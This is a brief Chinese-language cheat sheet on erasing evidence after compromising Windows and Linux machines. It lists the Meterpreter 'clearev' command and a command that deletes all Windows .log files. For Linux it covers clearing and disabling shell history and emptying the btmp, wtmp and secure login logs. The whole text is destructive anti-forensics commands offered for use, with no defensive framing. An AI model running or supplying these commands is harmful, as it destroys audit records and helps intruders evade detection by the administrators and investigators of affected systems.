windows下清理
win+r eventvwr
两种方法:
1 、meterpreter> clearev
2、meterpreter > shell
C:\Windows/system32>del %WINDIR%\*.log /a/s/q/f
linux清理
history -c
使系统不再保存历史命令
vi /etc/profile 找到 HISTSIZE这个值,改成 0
1、 删除访问失败的日志 echo > /var/log/btmp
2、删除访问成功的日志 echo > /var/log/wtmp
3、删除日志记录 echo > /var/log/secure
4、cat clog.sh